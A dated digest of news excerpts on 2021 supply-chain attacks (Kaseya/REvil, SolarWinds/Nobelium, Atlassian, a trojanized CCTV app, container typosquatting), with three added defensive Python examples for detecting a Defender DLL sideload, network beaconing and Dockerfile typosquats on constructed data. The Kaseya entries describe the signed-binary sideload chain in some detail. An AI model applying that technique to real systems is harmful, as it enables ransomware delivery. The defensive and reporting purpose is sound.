The sophisticated supply-chain ransomware attack targeting Kaseya first leveraged a vulnerability in the Kaseya VSA software to gain access to victim organizations and then used REvil's RaaS to infect those organizations with ransomware. Reports claim the threat actors deployed a malicious update through the Kaseya VSA interface, disguised as an update or hotfix for the Kaseya VSA agent.

Ref - Fortinet 

_______________________________________________________________________________________

(July 5, 2021)

Kaseya crippled by supply chain attack

REvil compromised on-premises Kaseya VSA servers and used them to deploy and distribute their ransomware. The ransomware encryptor is carried in the file agent.exe. When this file runs, it drops two files into the C:\Windows directory: an old but legitimately signed copy of the Windows Defender engine, MsMpEng.exe, and the encryptor payload, mpsvc.dll. Launching MsMpEng.exe from that directory causes a DLL sideload: the process loads the malicious mpsvc.dll sitting next to it in place of the legitimate DLL of the same name.

Ref - Upguard 

_______________________________________________________________________________________

(July 5, 2021)

Real-time prevention of the Kaseya VSA supply chain REvil ransomware attack

In the Kaseya attack, most of the attacked endpoints were Windows servers. The attack is particularly evasive because every component of the chain is digitally signed: it starts from the Kaseya agent process, continues with an outdated Microsoft Defender executable that is susceptible to DLL sideloading, and ends with the sideloaded ransomware DLL, which is itself signed.

Ref - Morphisec 
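The two write-ups above (Upguard and Morphisec) describe the same chain: a signed Defender engine binary dropped into C:\Windows and made to load a malicious mpsvc.dll from beside it. The detection logic below is an added example, not code from Kaseya, REvil or either vendor. It runs over constructed events shaped like Sysmon process-create and image-load records; the field names, the dropper being launched from cmd.exe, and the list of trusted Defender directories are assumptions to adapt to your own telemetry and estate.

```python
"""Detection logic for a relocated-Defender DLL sideload.

Added example, not code from Kaseya, REvil, Upguard or Morphisec. The events
are constructed to resemble Sysmon process-create and image-load records;
field names and the trusted Defender directories are assumptions.
"""
from dataclasses import dataclass
from pathlib import PureWindowsPath

# Assumption: directories a legitimate Defender engine binary runs from.
TRUSTED_DEFENDER_DIRS = (
    r"C:\Program Files\Windows Defender",
    r"C:\ProgramData\Microsoft\Windows Defender\Platform",
)


@dataclass
class Event:
    kind: str          # "ProcessCreate" or "ImageLoad"
    image: str         # full path of the process executable
    parent: str = ""   # parent process image (ProcessCreate)
    loaded: str = ""   # DLL path (ImageLoad)


def basename(path: str) -> str:
    return PureWindowsPath(path).name.lower()


def under_trusted_dir(path: str) -> bool:
    """True if the file's directory is one of (or below) the trusted dirs."""
    parent = str(PureWindowsPath(path).parent).lower()
    return any(parent == d.lower() or parent.startswith(d.lower() + "\\")
               for d in TRUSTED_DEFENDER_DIRS)


def find_sideload(events):
    """Return (rule, subject, detail) tuples for suspicious MsMpEng activity."""
    findings = []
    for e in events:
        if basename(e.image) != "msmpeng.exe":
            continue
        # Rule 1: the Defender engine started from a directory it is never
        # installed in (C:\Windows in the Kaseya chain), launched by a
        # dropper rather than by the service control manager.
        if e.kind == "ProcessCreate" and not under_trusted_dir(e.image):
            findings.append(("defender-engine-outside-install-dir", e.image, e.parent))
        # Rule 2: MsMpEng.exe resolved mpsvc.dll from its own, untrusted
        # directory, which is exactly what the sideload looks like.
        if e.kind == "ImageLoad" and basename(e.loaded) == "mpsvc.dll":
            same_dir = PureWindowsPath(e.loaded).parent == PureWindowsPath(e.image).parent
            if same_dir and not under_trusted_dir(e.loaded):
                findings.append(("mpsvc-sideload", e.image, e.loaded))
    return findings


def sample_events():
    """Constructed telemetry: a legitimate engine start and DLL load, then the
    dropper-launched copy in C:\\Windows that loads the payload DLL."""
    return [
        Event("ProcessCreate", r"C:\Program Files\Windows Defender\MsMpEng.exe",
              parent=r"C:\Windows\System32\services.exe"),
        Event("ImageLoad", r"C:\Program Files\Windows Defender\MsMpEng.exe",
              loaded=r"C:\Program Files\Windows Defender\mpsvc.dll"),
        Event("ProcessCreate", r"C:\Windows\agent.exe",
              parent=r"C:\Windows\System32\cmd.exe"),
        Event("ProcessCreate", r"C:\Windows\MsMpEng.exe",
              parent=r"C:\Windows\agent.exe"),
        Event("ImageLoad", r"C:\Windows\MsMpEng.exe",
              loaded=r"C:\Windows\mpsvc.dll"),
    ]


if __name__ == "__main__":
    for rule, subject, detail in find_sideload(sample_events()):
        print(f"{rule}: {subject} ({detail})")
```

Both rules key on the binary's location rather than its signature, because in this chain the signature check passes by design: the engine is Microsoft's own and the payload DLL was signed too. Rule 1 alone catches the Kaseya pattern; rule 2 is the generic form that also covers other sideload-prone signed binaries once you swap the DLL name.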

_______________________________________________________________________________________

(July 5, 2021)

Over 1000 organizations globally attacked on Fourth of July weekend, biggest supply chain attack since Sunburst

To breach on-premises Kaseya VSA servers, REvil used a zero-day vulnerability that was in the process of being fixed. The vulnerability had previously been disclosed to Kaseya by security researchers from the Dutch Institute for Vulnerability Disclosure (DIVD), and Kaseya was validating the patch before rolling it out to customers. REvil, however, was one step ahead and used the vulnerability to carry out the attack first.

Ref - CheckPoint

_______________________________________________________________________________________

(July 5, 2021)


US spy agencies investigate Kaseya supply chain attack

President Biden has ordered his intelligence agencies to investigate a major ransomware supply chain attack over the weekend that targeted a vendor of IT software used by managed service providers (MSPs). Suspected to be the work of a REvil affiliate, the attack on Miami-headquartered Kaseya was spotted by its incident response team at around midday on Friday.


_______________________________________________________________________________________

(July 5, 2021)

Hackers' sophisticated ransomware attack targeted a flaw in IT management

The hackers behind a mass ransomware attack exploited multiple previously unknown vulnerabilities in IT management software made by Kaseya Ltd., the latest sign of the skill and aggressiveness of the Russia-linked group believed responsible for the incidents.

Ref - Fortune 

_______________________________________________________________________________________

(July 5, 2021)


Kaseya defers decision about SaaS restoration after supply chain attack

IT management software provider Kaseya has deferred an announcement about the restoration of its SaaS services, after falling victim to a supply chain attack that has seen its products become a delivery mechanism for the REvil ransomware. On learning of the attack, Kaseya urged customers to pull the plug on their VSA servers, because the attack shuts off administrator access to the suite. The company also shuttered its SaaS services as a precautionary measure.

Ref - The Register 

_______________________________________________________________________________________

(July 4, 2021)

Guidance for MSPs and their customers affected by the Kaseya VSA supply-chain attack

CISA and FBI recommend that MSPs and their customers affected by the Kaseya VSA supply-chain attack take immediate action to implement cybersecurity best practices, starting with downloading and running the Kaseya VSA Detection Tool. The agencies also recommend enabling and enforcing multi-factor authentication (MFA) on every account under the organization's control.

Ref - US Cert 

_______________________________________________________________________________________

(July 4, 2021)

Kaseya supply chain attack targeting MSPs to deliver REvil ransomware

The threat actor, an affiliate of the REvil ransomware-as-a-service operation, identified and exploited a zero-day vulnerability in the VSA server. The exploit introduced a malicious script that the server then sent to every computer it managed, so the attack reached all of the end clients. The script delivered the REvil ransomware, which encrypted the systems.

Ref - TrueSec

_______________________________________________________________________________________

(July 4, 2021)

How Russian spies hacked the Justice, State, Treasury, Energy and Commerce Departments

The Department of Homeland Security spent billions on a program called "Einstein" to detect cyber attacks on government agencies. The Russians outsmarted it. They circumvented the NSA, which gathers intelligence overseas, but is prohibited from surveilling U.S. computer networks. So the Russians launched their attacks from servers set up anonymously in the United States.

Ref - CBS News 

_______________________________________________________________________________________

(July 4, 2021)

Independence Day: REvil uses supply chain exploits to attack hundreds of businesses

REvil's operators posted to their "Happy Blog", claiming that more than a million individual devices were infected by the malicious update. They also said they would be willing to provide a universal decryptor for victims of the attack, but only on the condition that they be paid $70,000,000 worth of Bitcoin.

Ref - Sophos 

_______________________________________________________________________________________

(July 4, 2021)

How U.S. cyber policy changed after SolarWinds

Since the disclosure of the SolarWinds attacks and the arrival of the new administration in the United States, several things have changed in the cybersecurity world. The Biden Administration imposed sanctions on Russia, ordered new cybersecurity standards for federal contracts with software companies, and chose the nation's first National Cyber Director.

Ref - CBS News 

_______________________________________________________________________________________

(July 3, 2021)

Kaseya ransomware supply chain attack: Key things to know

Several hundred organizations have been targeted by the REvil (aka Sodinokibi) ransomware in a supply chain attack involving Kaseya VSA software and multiple Managed Service Providers (MSPs) who use it. REvil attacks are usually financially motivated. However, there are some signs that the attacks may be politically motivated disruption.

Ref - Symantec

_______________________________________________________________________________________

(July 3, 2021)

Kaseya supply-chain attack hits nearly 40 service providers

Threat actors behind the notorious REvil cybercrime operation appear to have pushed ransomware via an update for Kaseya's IT management software, hitting around 40 customers worldwide, in what's an instance of a widespread supply-chain ransomware attack. Following the incident, the IT and security management services company said it took immediate steps to shut down its SaaS servers as a precautionary measure, in addition to notifying its on-premises customers to shut down their VSA servers to prevent them from being compromised.


_______________________________________________________________________________________

(July 3, 2021)

Kaseya supply-chain attack: What we know so far

Kaseya IT management software, commonly used in managed service provider (MSP) environments, was hit by the latest in a series of supply-chain attacks. As with the SolarWinds incident, this attack used a two-step malware delivery process that slipped in through the back door of IT environments. The cybercriminals behind it apparently had monetary gain rather than cyber espionage in their sights, ultimately planting ransomware by exploiting the trust relationship between Kaseya and its customers.


_______________________________________________________________________________________

(July 2, 2021)

REvil ransomware gang executes supply chain attack via malicious Kaseya update

The REvil ransomware gang appears to have gained access to infrastructure of Kaseya, a provider of remote management solutions, and is using a malicious update for the VSA software to deploy ransomware on enterprise networks.


_______________________________________________________________________________________

(July 2, 2021)

REvil ransomware hits 1,000+ companies in MSP supply-chain attack

Researchers are tracking 20 MSPs where Kaseya VSA was used to encrypt over 1,000 businesses and are working in close collaboration with six of them. They have proof that their customers are being encrypted as well. Kaseya issued a security advisory on their help desk site, warning all VSA customers to immediately shut down their VSA server to prevent the attack's spread while investigating.


_______________________________________________________________________________________

(July 2, 2021)

Kaseya VSA Supply-Chain Ransomware Attack

CISA is taking action to understand and address the recent supply-chain ransomware attack against Kaseya VSA and the multiple managed service providers (MSPs) that employ VSA software. CISA encourages organizations to review the Kaseya advisory and immediately follow their guidance to shut down VSA servers.

Ref - US Cert 

_______________________________________________________________________________________

(July 2, 2021)

Improve supply chain security with intelligence from surface, deep & dark web

In the past several months, the SolarWinds attack and the subsequent fallout have forced organizations to reexamine their supply chain security approach. Mitigating the supply chain threats involves a blended approach that includes secure development processes, vulnerability scanning and management, and endpoint security alongside effective vendor governance practices.


_______________________________________________________________________________________

(July 1, 2021)

Kaseya VSA supply-chain ransomware attack -Sophos report

Sophos said that the supply chain attack that uses Kaseya to deploy a variant of the REvil ransomware into a victim’s environment is geographically dispersed. It appears that the attackers used a zero-day vulnerability to remotely access internet-facing VSA Servers.

Ref - Sophos

_______________________________________________________________________________________

(June 30, 2021)

11 Tactics to prevent supply chain attacks

To prevent supply chain attacks, organizations can follow these tactics, which include deploying honeytokens, securing privileged access management, and adopting a zero-trust architecture. They should also plan their defenses on the assumption that they will be attacked.

Ref - Upguard 

_______________________________________________________________________________________

(June 29, 2021)

Improving the security of your supply chain through integration

To counter the threat of a supply chain incursion, companies are well served by the latest generation of highly specialized threat intelligence solutions. Take a breach and attack simulation (BAS) tool like Cymulate for example. BAS solutions can help reduce supply chain risk by conducting ongoing, automated penetration testing. They identify vulnerabilities by mimicking the tactics used by bad actors and showing you where you’re most exposed.

Ref - Mimecast 

_______________________________________________________________________________________

(June 29, 2021)

Zero-Trust doesn’t mean zero breaches

The detailed and specific answer to any particular breach depends on the actual mechanism incorporated for the initial infection and/or propagation. In the case of SolarWinds, the initial infection threat vector is unknown. Its dissemination technique, on the other hand, is as public as it is horrifying: the previously trusted software supply chain.

Ref - Forrester 

_______________________________________________________________________________________

(June 29, 2021)

Denmark's central bank exposed in SolarWinds hack

Denmark's central bank was compromised in last year's global SolarWinds hacking operation, which left a backdoor into its network open for seven months until it was discovered by U.S. security firm FireEye, Version2 reported, citing documents such as SolarWinds emails that it obtained under a freedom of information request.

Ref - Reuters 

_______________________________________________________________________________________

(June 28, 2021)


SolarWinds attack cost affected companies an average of $12 million

A recent ‘2021 Cybersecurity Impact Report’ from IronNet has revealed some interesting facts about Solarwinds attacks. The report is based on interviews with 473 security IT decision-makers from the U.S., U.K., and Singapore who work in the technology, financial, public service, and utility sectors. The survey found that 90% of respondents said their security posture had improved over the last two years, but 86% suffered attacks severe enough to require a meeting of the companies' C-level executives or boards of directors.


_______________________________________________________________________________________

(June 28, 2021)


Some UW institutions used software compromised by Russian hackers - US Officials

Email records show University of Wisconsin System cybersecurity staff raced to determine whether any of its 26 campuses or central office had been impacted by the global SolarWinds hacking incident discovered in December 2020. According to documents, some UW institutions were running the compromised software, though it's unclear whether attackers stole information or disrupted university networks.

Ref - WPR.org 

_______________________________________________________________________________________

(June 28, 2021)


SolarWinds hackers continue the assault with a new Microsoft breach

The nation-state hackers who orchestrated the SolarWinds supply chain attack compromised a Microsoft worker's computer and used the access to launch targeted attacks against company customers. The hacking group also compromised three entities using password spraying and brute-force techniques, which gain unauthorized access to accounts by bombarding login servers with large numbers of password guesses.

Ref - Wired 

_______________________________________________________________________________________

(June 28, 2021)


Microsoft says new breach discovered in probe of suspected SolarWinds hackers

Microsoft said that an attacker had gained access to one of its customer-service agents and then used information from that to launch hacking attempts against customers. The company said it had found the compromise during its response to hacks by a team it identifies as responsible for earlier major breaches at SolarWinds and Microsoft.

Ref - Reuters

_______________________________________________________________________________________

(June 28, 2021)


SolarWinds attack cost affected companies in key sectors 11% of total annual revenue

IronNet Cybersecurity released its 2021 Cybersecurity Impact Report assessing timely topics such as the estimated cost per enterprise of the SolarWinds cyber attack, executive-level engagement in attack responses, and the effect of information sharing on an organization’s overall security posture. Among the 85 percent of respondents affected by SolarWinds, nearly one-third said their organization felt a significant financial impact from the attack. In fact, the attack cost affected companies, on average, 11 percent of their annual revenue.


_______________________________________________________________________________________

(June 27, 2021)


IT companies bear brunt of new SolarWinds hacker attacks

IT companies have made up the majority of organizations targeted amid new activity by the group behind last year’s SolarWinds supply-chain attack, with at least one victim coming from Microsoft’s customer support ranks. The attack mostly targeted IT companies, which comprised 57% of total targets, followed by government (20%), and smaller percentages for non-governmental organizations and think tanks, as well as financial services.

Ref - ARNNet

_______________________________________________________________________________________

(June 26, 2021)


Microsoft says SolarWinds hackers attacked three in a new breach

Microsoft Corp. said the hackers behind the SolarWinds cyberattack recently compromised a new trio of victims using access to one of the company’s customer support agents. The hacked portal used by the individual agent contained information for a small number of customers, which the attackers used to launch a highly targeted attack.

Ref - Yahoo 

_______________________________________________________________________________________

(June 26, 2021)


Microsoft admits to signing rootkit malware in supply-chain fiasco

Microsoft has confirmed that it signed a malicious driver that was being distributed within gaming environments. The driver, called "Netfilter," is in fact a rootkit: it provides no legitimate functionality and was observed communicating with China-based command-and-control (C2) IP addresses, which is what raised suspicions.


_______________________________________________________________________________________

(June 25, 2021)


The majority of large businesses caught up in supply chain attacks last year

The majority of large enterprises (64 percent) suffered a software supply chain attack last year, according to a report from security company Anchore. The report states that the use of software containers is on the rise thanks to the widespread use of DevOps processes to speed up development. This report highlights that 60 percent of respondents have made securing the software supply chain a top initiative for 2022.

Ref - ITProportal 

_______________________________________________________________________________________

(June 25, 2021)


New Nobelium activity disclosed by Microsoft

The Microsoft Threat Intelligence Center is tracking new activity from the NOBELIUM threat actor, which includes password spray and brute-force attacks. The activity was largely focused on US interests, about 45%, followed by 10% in the UK, and smaller numbers from Germany and Canada. In all, 36 countries were targeted.

Ref - Microsoft 

_______________________________________________________________________________________

(June 24, 2021)


Atlassian bugs could have led to a 1-click takeover

Flaws in Atlassian's infrastructure could have enabled a supply-chain attack: with just one click, an attacker could have siphoned sensitive information out of Jira, including security issues on Atlassian Cloud, Bitbucket, and on-premises products. The flaws could also have allowed an attacker to take over accounts and control some of Atlassian's applications, including Jira and Confluence.

Ref - ThreatPost 

_______________________________________________________________________________________

(June 24, 2021)


The power of anonymity in supply chain security

A large number of MSPs are managing Microsoft 365 for clients. So it’s critical that they protect Microsoft 365 with an email security solution that is integrated with Microsoft 365 via API, sitting inside Microsoft’s architecture. This architectural structure has a number of advantages, including making the solution invisible to hackers in an MX record query and allowing for internal email scanning, which can thwart lateral phishing and ransomware attacks within Microsoft 365.


_______________________________________________________________________________________

(June 24, 2021)


Shifting left with analytics to identify software supply chain anomalies

The supply chain can be compromised partly because of a lack of security monitoring and oversight over how software is coded and delivered (continuous integration/continuous delivery, or CI/CD, pipelines), which creates a dangerous security gap. The gap widens because conventional security testing does not look for unexpected changes in the software systems themselves.

 
_______________________________________________________________________________________

(June 24, 2021)


A supply-chain breach: Taking over an Atlassian account

On November 16, 2020, Check Point Research (CPR) uncovered chained vulnerabilities that together could be used to take over an account and control some of the Atlassian apps connected through SSO. Check Point has recently released further details. According to them, once attackers leverage these vulnerabilities and take over an account, they can plant backdoors for use in future supply-chain attacks.

 
_______________________________________________________________________________________

(June 23, 2021)


SUNBURST: Attack Flow, C2 Protocol, and Prevention

The SUNBURST backdoor is not yet fully understood. Spanning almost 3,500 lines of code, "obfuscated" through innocuous-looking naming intended to evade shallow review, it has many subtleties yet to uncover. The Cynet research team attempted to gain a better understanding of the command-and-control communication channel, its various stages, and the conditions required for execution. The main goal of the investigation is to find infected machines that are beaconing to the attackers.

Ref - Cynet
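Finding beaconing machines, the goal named above, usually starts from network telemetry rather than from the implant itself. The script below is an added example, not Cynet's code, and it does not reproduce SUNBURST's actual C2 protocol or domains. It applies a generic periodicity heuristic to constructed outbound-connection log lines in an assumed "<ISO timestamp> src=<host> dst=<ip>:<port>" format: for every (source, destination) pair it measures how regular the gaps between connections are. The event-count and regularity thresholds are assumptions; real implants add jitter and long initial sleeps, so hits are leads to triage, not verdicts.

```python
"""Periodicity heuristic for spotting beaconing hosts in connection logs.

Added example, not Cynet's code and not tied to SUNBURST's real C2 format.
Log format, thresholds and sample traffic below are all constructed.
"""
import statistics
from collections import defaultdict
from datetime import datetime, timedelta


def parse_line(line):
    """'2021-06-01T00:00:00 src=ws-17 dst=203.0.113.5:443' -> dict"""
    ts, *fields = line.split()
    rec = dict(f.split("=", 1) for f in fields)
    rec["ts"] = datetime.fromisoformat(ts)
    return rec


def beacon_candidates(lines, min_events=6, max_cv=0.10):
    """Group connections by (src, dst) and score how regular the gaps are.

    The coefficient of variation (stdev / mean) of the inter-connection gaps
    is near 0 for a fixed-interval beacon and large for human-driven traffic.
    """
    stamps = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        stamps[(rec["src"], rec["dst"])].append(rec["ts"])

    results = {}
    for key, times in stamps.items():
        if len(times) < min_events:      # too few samples to judge regularity
            continue
        times.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
        period = statistics.mean(gaps)
        cv = statistics.pstdev(gaps) / period if period > 0 else float("inf")
        results[key] = {"n": len(times), "period": period, "cv": cv,
                        "beacon": cv <= max_cv}
    return results


# Constructed inter-connection gaps in seconds: a roughly five-minute beacon
# with light jitter, and an irregular series a user's browser might produce.
SAMPLE_GAPS = {
    "203.0.113.5:443": [300, 310, 295, 305, 300, 298, 302, 300],
    "198.51.100.9:443": [5, 120, 3, 900, 40, 15, 600],
}


def sample_log():
    """Render SAMPLE_GAPS as log lines from one workstation, in time order."""
    start = datetime(2021, 6, 1, 0, 0, 0)
    lines = []
    for dst, gaps in SAMPLE_GAPS.items():
        t = start
        lines.append(f"{t.isoformat()} src=ws-17 dst={dst}")
        for g in gaps:
            t += timedelta(seconds=g)
            lines.append(f"{t.isoformat()} src=ws-17 dst={dst}")
    return sorted(lines)


if __name__ == "__main__":
    for (src, dst), r in beacon_candidates(sample_log()).items():
        flag = "BEACON?" if r["beacon"] else "ok"
        print(f"{src} -> {dst}: n={r['n']} period={r['period']:.0f}s "
              f"cv={r['cv']:.2f} {flag}")
```

In practice the same grouping is applied to DNS query logs keyed on the queried domain rather than on a destination socket, which is the telemetry most shops actually retain for long enough to see a slow beacon. Raise min_events and lower max_cv to cut noise, and expect to loosen max_cv for implants that deliberately randomize their sleep.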

_______________________________________________________________________________________

(June 22, 2021)


Hackers are trying to attack big companies, and small suppliers are the weakest link

Researchers at cybersecurity company BlueVoyant examined hundreds of SMB defense subcontractor firms. Over half were found to have severe vulnerabilities within their networks, including unsecured ports and unsupported or unpatched software, leaving them exposed to cyberattacks including data breaches and ransomware.

Ref - ZDNet 

_______________________________________________________________________________________

(June 22, 2021)


An unpatched flaw in Linux Pling Store apps could lead to supply-chain attacks

Cybersecurity researchers have disclosed a critical unpatched vulnerability affecting Pling-based free and open-source software (FOSS) marketplaces for the Linux platform that could potentially be abused to stage supply-chain attacks and achieve remote code execution (RCE).


_______________________________________________________________________________________

(June 22, 2021)


Three lessons CISOs can learn from the SolarWinds cyberattack

Here are some lessons CISOs can learn from the SolarWinds incident to change the way they secure and manage their supply-chain infrastructure. Continuous visibility into interconnected networks, inventory management with good cyber hygiene, implementation of a zero trust model, and role-based access to privileged accounts can all help minimize the risks.

 
_______________________________________________________________________________________

(June 22, 2021)


Government-mandated SBOMs to throw light on software supply chain security

An SBOM is effectively an ingredient list or a nested inventory, a formal record containing the details and supply chain relationships of various components used in building software. The EO requires NTIA to produce three proposed minimum elements that should go into any SBOM: data fields, operational considerations, and support for automation.

Ref - CSO Online 

_______________________________________________________________________________________

(June 22, 2021)


U.S. SEC probing SolarWinds clients over cyber breach disclosures

The U.S. Securities and Exchange Commission (SEC) has opened a probe into last year's SolarWinds cyber breach, focusing on whether some companies failed to disclose that they had been affected by the unprecedented hack. The SEC sent investigative letters late last week to a number of public issuers and investment firms seeking voluntary information on whether they had been victims of the hack and failed to disclose it.

Ref - Reuters 

_______________________________________________________________________________________

(June 21, 2021)


CISA doesn't know how many US federal agencies use firewalls

The Department of Homeland Security’s top cybersecurity agency doesn’t know how many agencies are segmenting their networks from unwanted outside traffic. The agency provided the answers in response to a February inquiry from Wyden’s office following a heated Senate Intelligence Committee hearing about the breach at the federal contractor SolarWinds.


_______________________________________________________________________________________

(June 21, 2021)


Attacks against container infrastructures increasing, including supply chain attacks

Hiding an attack inside a CI build would succeed in most organizations' CI environments. Such an attack targets supply-chain processes and could be adapted to target other hidden supply-chain components, processes, or even the build artifacts themselves, posing a severe threat.

 
_______________________________________________________________________________________

(June 21, 2021)


Lessons from the JBS attack for securing the manufacturing supply chain

There are several lessons from the JBS attack that will help manufacturing leaders secure their infrastructure. Organizations need to control access to ecosystem applications and automate identity governance. In addition, they need to strengthen authentication using Continuous Adaptive Risk and Trust (CARTA) and Zero Trust security and secure non-human identities.


_______________________________________________________________________________________

(June 21, 2021)


Software-container supply chain sees spike in attacks

Typosquatting and credential stuffing are two of the most common ways that attackers are attempting to target companies' container infrastructure and the Docker-image supply chain, with attacks climbing nearly 600% in the second half of 2020 compared with the same period a year ago.

Ref - Darkreading 
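The typosquatting half of that finding is easy to check for at build time. The script below is an added example, not code from the report's authors: it parses the FROM lines of a Dockerfile, strips registry, tag and digest to recover the repository name, and compares that name against an allowlist of approved official images using edit distance. The allowlist, the two-edit threshold and the Dockerfile are all constructed for the example; the namespace check additionally flags an approved image name pulled from a namespace other than the official library, which is the other common way a look-alike image gets in.

```python
"""Audit Dockerfile base images for typosquats of approved official images.

Added example with a constructed Dockerfile and an assumed allowlist.
"""
import re

APPROVED_OFFICIAL = {"nginx", "python", "alpine", "redis", "node"}  # assumption
MAX_EDITS = 2  # assumption: names this close to an approved one are suspicious
# FROM [--platform=...] <image> [AS name]
FROM_RE = re.compile(r"^\s*FROM\s+(?:--\S+\s+)*(\S+)", re.I | re.M)


def edit_distance(a, b):
    """Levenshtein distance by the classic two-row dynamic programme."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1,            # delete
                           cur[j - 1] + 1,         # insert
                           prev[j - 1] + (ca != cb)))  # substitute
        prev = cur
    return prev[-1]


def split_image_ref(ref):
    """Return (namespace, repository) for a Docker image reference."""
    ref = ref.split("@", 1)[0]                 # drop @sha256:... digest
    parts = ref.split("/")
    repo = parts[-1]
    if ":" in repo:
        repo = repo.rsplit(":", 1)[0]          # drop :tag
    if len(parts) == 1:
        ns = "library"                          # bare name = official image
    elif len(parts) == 2 and re.search(r"[.:]|^localhost$", parts[0]):
        ns = "library"                          # registry host only, implicit library
    else:
        ns = parts[-2]
    return ns.lower(), repo.lower()


def classify(ref):
    """Return (verdict, detail) for one image reference."""
    ns, repo = split_image_ref(ref)
    if repo in APPROVED_OFFICIAL:
        if ns == "library":
            return "ok", repo
        return "unofficial-namespace", f"{ns}/{repo}"
    dist, nearest = min((edit_distance(repo, ok), ok) for ok in APPROVED_OFFICIAL)
    if dist <= MAX_EDITS:
        return "possible-typosquat", f"{repo} ~ {nearest}"
    return "unknown-image", repo


def audit_dockerfile(text):
    """List (image_ref, verdict, detail) for every FROM line in the file."""
    return [(ref, *classify(ref)) for ref in FROM_RE.findall(text)]


# Constructed Dockerfile mixing clean, typosquatted, and off-namespace images.
SAMPLE_DOCKERFILE = """\
# constructed multi-stage build
FROM docker.io/library/nginx:1.21 AS web
FROM --platform=linux/amd64 ngnix:latest
FROM myregistry.example:5000/team/python:3.9-slim
FROM alpine@sha256:0000000000000000000000000000000000000000000000000000000000000000
FROM busybox
"""

if __name__ == "__main__":
    for ref, verdict, detail in audit_dockerfile(SAMPLE_DOCKERFILE):
        print(f"{verdict:22} {ref}  [{detail}]")
```

Run it as a pre-merge check and fail the build on anything other than "ok"; the "unknown-image" verdict is the one you will tune most, since a legitimate image absent from the allowlist looks the same as a throwaway one. Pinning by digest, as the alpine line does, removes the tag-mutation problem but not the name problem, which is why the name check runs on digest-pinned references too.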

_______________________________________________________________________________________

(June 21, 2021)


SolarWinds hack could have been deterred by simple security measures

The SolarWinds hack, one of the largest cybersecurity incidents in U.S. history, may have been deterred or minimized if basic security measures had been put in place. CISA agrees that a firewall blocking all outgoing connections to the internet would have neutralized the malware.

Ref - The Hill

_______________________________________________________________________________________

(June 18, 2021)


Google dishes out homemade SLSA to thwart software supply-chain attacks

Google has proposed a framework called SLSA for dealing with supply chain attacks, a security risk exemplified by the recent compromise of the SolarWinds Orion IT monitoring platform. SLSA – short for Supply chain Levels for Software Artifacts and pronounced "salsa" for those inclined to add convenience vowels – aspires to provide security guidance and programmatic assurance to help defend the software build and deployment process.

Ref - The Register 

_______________________________________________________________________________________

(June 18, 2021)


How PAM can protect feds from third-party/ service account cyber attacks

PAM solutions manage and control privileged accounts by isolating, monitoring, recording, and auditing these account sessions, commands, and actions. Third parties and service accounts cannot do their jobs a majority of the time without elevated privileges for access – thus making them a de facto part of the agency enterprise.

Ref - Meritalk

_______________________________________________________________________________________

(June 17, 2021)


Firmware security requires firm supply chain agreements

According to Bloomberg, China's theft of technology is the biggest threat to corporate America and the U.S. military, and Russia has proven expert at infiltrating the supply chain of trusted code, as the SolarWinds breach and 20 years' worth of cyber espionage and attacks show. Organizations need to embed security controls into their supply chain agreements before they take possession of a product.


_______________________________________________________________________________________

(June 17, 2021)


Lessons learned from the SolarWinds cyberattack and the future of NY-DFS

The New York DFS alerted DFS-regulated entities of the SolarWinds attack on December 18, 2020, through its "Supply Chain Compromise Alert." In general, DFS found that its regulated entities responded swiftly and appropriately, with 94% of impacted companies removing the compromised SolarWinds systems from their networks (or patching them) within three days of being notified of the attack. However, DFS noted gaps in the cybersecurity policies of several regulated entities, including irregular patching and weaknesses in patch management.

Ref - Mondaq 

_______________________________________________________________________________________

(June 17, 2021)


UNC2465 cybercrime group launched a supply chain attack on CCTV vendor

An affiliate of the DARKSIDE ransomware gang, tracked as UNC2465, has conducted a supply chain attack through a CCTV vendor, trojanizing the Dahua SmartPSS Windows app that the vendor distributed to its customers. UNC2465 is considered one of the main affiliates of the DARKSIDE group, alongside UNC2628 and UNC2659, which FireEye/Mandiant track as further affiliates.


_______________________________________________________________________________________

(June 17, 2021)


The SolarWinds attack and its lessons

The increase in sophisticated and complex cyberattacks like SolarWinds requires a change in the traditional security paradigm, raising the priority of cybersecurity and its policies. The article proposes two types of policies: prevention policies and problem-solving policies.


_______________________________________________________________________________________

(June 16, 2021)


Everything you need to know about SolarWinds hack

The purpose of the hack remains largely unknown. Still, there are many reasons hackers would want to get into an organization's system, including having access to future product plans or employee and customer information held for ransom. It is also not yet clear what information, if any, hackers stole from government agencies. But the level of access appears to be deep and broad.

Ref - TechTarget 

_______________________________________________________________________________________

(June 16, 2021)


Smoking out a Darkside affiliate’s supply chain software compromise

Mandiant observed DARKSIDE affiliate UNC2465 accessing at least one victim through a Trojanized software installer downloaded from a legitimate website. While this victim organization detected the intrusion, engaged Mandiant for incident response, and avoided ransomware, others may be at risk. UNC2465’s move from drive-by attacks on website visitors or phishing emails to this software supply chain attack shows a concerning shift that presents new challenges for detection. 

Ref - FireEye
 
_______________________________________________________________________________________

(June 16, 2021)


New ThroughTek IoT supply chain vulnerability announced

DHS and Nozomi Networks Labs announced a new vulnerability discovered in a ThroughTek software component that’s used broadly by many security cameras and smart device vendors. The ThroughTek component is part of the supply chain for many original equipment manufacturers (OEMs) of consumer-grade security cameras and IoT devices. ThroughTek states that its technology is used by several million Internet of Things (IoT)-connected devices.


_______________________________________________________________________________________

(June 16, 2021)


Darkside operator involved in supply chain attack via CCTV vendor’s website

A cybercrime group that used to cooperate with the Darkside ransomware gang has breached the website of a CCTV camera vendor and inserted malware (SMOKEDHAM backdoor) in a Windows application the company’s customers were using to configure and control their security feeds. The malware was hidden inside a customized version of the Dahua SmartPSS Windows app that the unnamed CCTV vendor was providing to its customers.

Ref - The Record 

_______________________________________________________________________________________

(June 16, 2021)


Supply chain attacks and vulnerability disclosures

SolarWinds, giant aviation digital services provider SITA, and DevOps tool provider Codecov are among this year’s victims of supply chain attacks that continue to create a ripple effect of data breaches across their customers, exposing millions of records. The latest attack on supply chains is on Edward Don and Company, a known distributor of foodservice equipment and supplies in the U.S.

Ref - ECCouncil 

_______________________________________________________________________________________

(June 16, 2021)


SolarWinds’ transparency trying to ensure others are safer

Sudhakar Ramakrishna, President and CEO of SolarWinds, shared his thoughts on the importance of continuous learning from everything, be it a bug or a cyber incident. These lessons will fortify what can be done going forward to make it that much more difficult for a threat actor to carry out their attacks.

Ref - Carahsoft 

_______________________________________________________________________________________

(June 14, 2021)


